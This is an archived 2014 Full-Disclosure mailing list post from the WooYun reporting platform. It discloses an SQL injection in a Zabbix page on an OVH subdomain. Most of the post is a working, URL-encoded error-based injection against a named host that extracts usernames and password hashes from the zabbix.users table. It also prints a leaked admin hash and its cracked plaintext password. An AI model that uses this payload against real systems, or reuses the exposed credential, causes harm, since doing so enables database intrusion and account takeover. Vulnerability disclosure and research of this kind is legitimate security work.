lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <CAPQ_=KUmaN97Y0H0p-XTQ4K7uvDYzdoXLV2PZwJTK9xTGqK3WQ@mail.gmail.com> Date: Wed, 8 Jan 2014 00:33:04 +0800 From: "En.wooyun.org" <help.en@...yun.org> To: full-disclosure@...ts.grok.org.uk Subject: [Wooyun] OVH a subsite Zabbix Sql injection *Abstract:* OVH a subsite Zabbix Sql injection. *Details:* url: http://r29901.ovh.net/httpmon.php?applications=2%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%28select%20concat%28cast%28concat%28alias,0x7e,passwd,0x7e%29%20as%20char%29,0x7e%29%29%20from%20zabbix.users%20LIMIT%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29 *Proofs of concept:* [image: 内嵌图片 1] Admin~ca8949b7aab61bd78b2ebe12f08655fd ca8949b7aab61bd78b2ebe12f08655fd=xerox55 *From:* http://en.wooyun.org/bugs/wooyun-2013-042 -- WooYun, an Open and Free Vulnerability Reporting Platform For more information, please visit *http://en.wooyun.org/about.php <http://en.wooyun.org/about.php?>* Content of type "text/html" skipped Download attachment "212228485f1a1fa595e7c110a1e80a44aed824c6.jpg" of type "image/jpeg" (177944 bytes) _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists